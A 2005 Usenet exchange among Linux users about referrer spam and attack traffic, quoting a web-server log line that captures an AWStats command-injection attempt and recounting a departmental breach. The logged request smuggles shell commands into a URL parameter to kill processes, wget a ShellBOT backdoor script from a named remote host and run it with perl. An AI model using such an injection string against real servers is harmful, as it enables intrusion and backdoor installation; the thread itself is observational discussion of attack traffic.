__/ [Tim Smith] on Thursday 13 October 2005 13:37 \__
> In article <dikn2f$2n3r$1@xxxxxxxxxxxxxxxxx>,
> Roy Schestowitz <newsgroups@xxxxxxxxxxxxxxx> wrote:
>
>> I have yet another reason to hate Windows with /passion/. My Linux server
>> has come under heavy attacks by Windows machine that had been hijacked
>> and it's putting my Web host in jeopardy. Motive? Referrer spam that
>> comes with the visits en masse.
>
> I checked my logs to see if I have any of those, and I'm not getting
> hit. However, I did notice this interesting item:
>
> 211.21.77.62 - - [12/Oct/2005:19:24:45 -0700] "GET
> /awstats/awstats.pl?configdir=|echo%20;kill%20-9%20-1;cd%20/tmp;wget%20ht
> tp://jimi.springsips.com/~alicia/ice.txt%20;perl%20/tmp/ice.txt;a;echo%20
> ;echo| HTTP/1.1" 404 1021 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
> Windows 98)"
>
> Looks like someone is trying to exploit a problem with awstats on Unix
> systems. Even though the user agent string claims Windows 98,
> 211.21.77.62 is running Red Hat Linux.
>
> As of right now, you can run that wget command it is trying to do and
> get the script it wants to run. It's a version of the ShellBOT
> backdoor, which has been around for a while:
>
> <http://forum.powweb.com/showthread.php?t=55648>
>
> It's kind of a nice break amid all the usual Windows malware crap I see
> in my web logs to actually run across some Unix malware that is actually
> in the wild and trying to spread. :-)
*smile*
Speaking of the notorious AWStats exploit, this morning I read a message
from the head sysadmin at the Computer Science Department.
Somebody[1] questionably invoked AWStats from /tmp. It had to be assumed
that the attacker got a copy of the password file in the research domain.
All were forced to urgently change passwords. I occasionally notice
attempts to exploit (non-existing) AWStats on my domain. My AWStats
installation is behind an authentication wall.
Roy
[1]I am guessing an infiltration via SSH of which there are endless attempts
from the east
--
Roy S. Schestowitz | "How do I set my laser printer on stun?"
http://Schestowitz.com | SuSE Linux | PGP-Key: 74572E8E
2:25pm up 49 days 2:39, 3 users, load average: 0.28, 0.52, 0.54
http://iuron.com - next generation of search paradigms
|
|
